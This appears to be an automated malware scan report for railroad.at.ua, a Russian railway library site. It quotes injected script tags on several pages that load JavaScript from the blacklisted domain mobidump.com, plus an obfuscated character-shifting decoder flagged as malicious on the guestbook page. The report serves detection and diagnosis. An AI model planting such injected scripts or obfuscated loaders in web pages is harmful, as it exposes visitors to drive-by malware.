Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=railroad.at.ua
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://railroad.at.ua/ | 200 OK Content-Length: 66244 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: mobidump.com ...[1121 bytes skipped]... H^U!e0Rgoo"></iframe><div><script type="text/javascript">new Image().src = "http://counter.yadro.ru/hit;ucoznet?r"+escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();</script></div><HTML><script language='javascript' type='text/javascript' src='http://mobidump.com/7h4p5qn4pwc3ofqwg1w'></script><script language='javascript' type='text/javascript' src='http://mobidump.com/78tdia64wf06625gnnlvyr5mcqzmftaffpd81rw6ji'></script><HEAD><TITLE>Библиотека Железной Дороги - Главная страница</TITLE> <META content="text/html; charset=UTF-8" http-equiv=content-type><LINK rel=StyleSheet type=text/css href="/_st/my.css"> <META name=GENERATOR content="MSHTML 8 ...[2679 bytes skipped]... | ||
http://mobidump.com/7h4p5qn4pwc3ofqwg1w | 200 OK Content-Length: 8665 Content-Type: text/javascript | clean |
http://mobidump.com/78tdia64wf06625gnnlvyr5mcqzmftaffpd81rw6ji | 200 OK Content-Length: 8665 Content-Type: text/javascript | clean |
http://s104.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s104.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s104.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://railroad.at.ua/news/rss/ | 200 OK Content-Length: 48885 Content-Type: text/xml | clean |
http://railroad.at.ua/test404page.js | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://railroad.at.ua/register | 200 OK Content-Length: 33935 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: mobidump.com ...[1121 bytes skipped]... zzLQ1LRUoo"></iframe><div><script type="text/javascript">new Image().src = "http://counter.yadro.ru/hit;ucoznet?r"+escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();</script></div><HTML><script language='javascript' type='text/javascript' src='http://mobidump.com/7h4p5qn4pwc3ofqwg1w'></script><script language='javascript' type='text/javascript' src='http://mobidump.com/78tdia64wf06625gnnlvyr5mcqzmftaffpd81rw6ji'></script> <HEAD><TITLE>Страница регистрации - Библиотека Железной Дороги</TITLE> <META content="text/html; charset=UTF-8" http-equiv=content-type><LINK rel=StyleSheet type=text/css href="/_st/my.css"> <META name=GENERATOR cont ...[2537 bytes skipped]... | ||
http://railroad.at.ua/index/0-2 | 200 OK Content-Length: 30605 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: mobidump.com ...[1117 bytes skipped]... q2Txh5fgoo"></iframe><div><script type="text/javascript">new Image().src = "http://counter.yadro.ru/hit;ucoznet?r"+escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();</script></div><HTML><script language='javascript' type='text/javascript' src='http://mobidump.com/7h4p5qn4pwc3ofqwg1w'></script><script language='javascript' type='text/javascript' src='http://mobidump.com/78tdia64wf06625gnnlvyr5mcqzmftaffpd81rw6ji'></script> <HEAD><TITLE>Библиотека Железной Дороги - Информация о сайте</title> <link type="text/css" rel="StyleSheet" href="http://s104.ucoz.net/src/base.css" /> <link type="text/css" rel="StyleSheet" href="http://s104.ucoz.net/src/lay ...[2705 bytes skipped]... | ||
http://railroad.at.ua/publ | HTTP/1.1 301 Moved Permanently Cache-Control: private Connection: close Date: Mon, 26 Jan 2015 02:55:35 GMT Location: http://railroad.at.ua/publ/ Server: uServ/3.2.2 Content-Type: application/octet-stream Set-Cookie: 2railroaduCoz=; path=/; expires=Sat, 26-Jan-2013 02:55:35 GMT; domain=.railroad.at.ua; | clean |
http://railroad.at.ua/publ/ | 200 OK Content-Length: 73266 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: mobidump.com ...[1111 bytes skipped]... LLtNtGtfEo"></iframe><div><script type="text/javascript">new Image().src = "http://counter.yadro.ru/hit;ucoznet?r"+escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();</script></div><HTML><script language='javascript' type='text/javascript' src='http://mobidump.com/7h4p5qn4pwc3ofqwg1w'></script><script language='javascript' type='text/javascript' src='http://mobidump.com/78tdia64wf06625gnnlvyr5mcqzmftaffpd81rw6ji'></script> <HEAD><TITLE>Каталог статей - Библиотека Железной Дороги</TITLE> <META content="text/html; charset=UTF-8" http-equiv=content-type><LINK rel=StyleSheet type=text/css href="/_st/my.css"> <META name=GENERATOR content="MSHTML ...[2579 bytes skipped]... | ||
http://railroad.at.ua/publ/rss/ | 200 OK Content-Length: 31177 Content-Type: text/xml | clean |
http://railroad.at.ua/forum | 200 OK Content-Length: 19291 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: mobidump.com ...[1127 bytes skipped]... FvdLkNE8vh"></iframe><div><script type="text/javascript">new Image().src = "http://counter.yadro.ru/hit;ucoznet?r"+escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();</script></div><HTML><script language='javascript' type='text/javascript' src='http://mobidump.com/7h4p5qn4pwc3ofqwg1w'></script><script language='javascript' type='text/javascript' src='http://mobidump.com/78tdia64wf06625gnnlvyr5mcqzmftaffpd81rw6ji'></script> <HEAD><TITLE>Форум</TITLE> <META content="text/html; charset=UTF-8" http-equiv=content-type><LINK rel=StyleSheet type=text/css href="/_st/my.css"> <META name=GENERATOR content="MSHTML 8.00.7601.17537"><link type="text/css" rel="StyleSheet" href="ht ...[2578 bytes skipped]... | ||
http://railroad.at.ua/forum/0-0-0-37 | 200 OK Content-Length: 5256 Content-Type: text/xml | clean |
http://railroad.at.ua/gb | 200 OK Content-Length: 50258 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _y8M=''; function _dS(s){ var i;var r=""; var l=s.length-1; var k=s.substr(l,1); for (i=0;i<l;i++){ c=s.charCodeAt(i)-k; if(c<32){ c=127-(32-c);} r+=String.fromCharCode(c); } return r;} _y8M=_dS('@mrtyx$x}tiA&lmhhir&$reqiA&wsw&$zepyiA&54654<<=94&$3B4'); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: railroad.at.ua
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: private
Connection: close
Date: Mon, 26 Jan 2015 02:55:26 GMT
Pragma: no-cache
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: 2railroaduCoz=; path=/; expires=Sat, 26-Jan-2013 02:55:26 GMT; domain=.railroad.at.ua;
Set-Cookie: 2railroaduzll=1422240926; path=/; expires=Tue, 26-Jan-2016 02:55:26 GMT; domain=.railroad.at.ua;
Set-Cookie: 2railroaduCoz=; path=/; expires=Sat, 26-Jan-2013 02:55:26 GMT; domain=.railroad.at.ua;
Second query (visit from search engine):
GET / HTTP/1.1
Host: railroad.at.ua
Referer: http://www.google.com/search?q=railroad.at.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.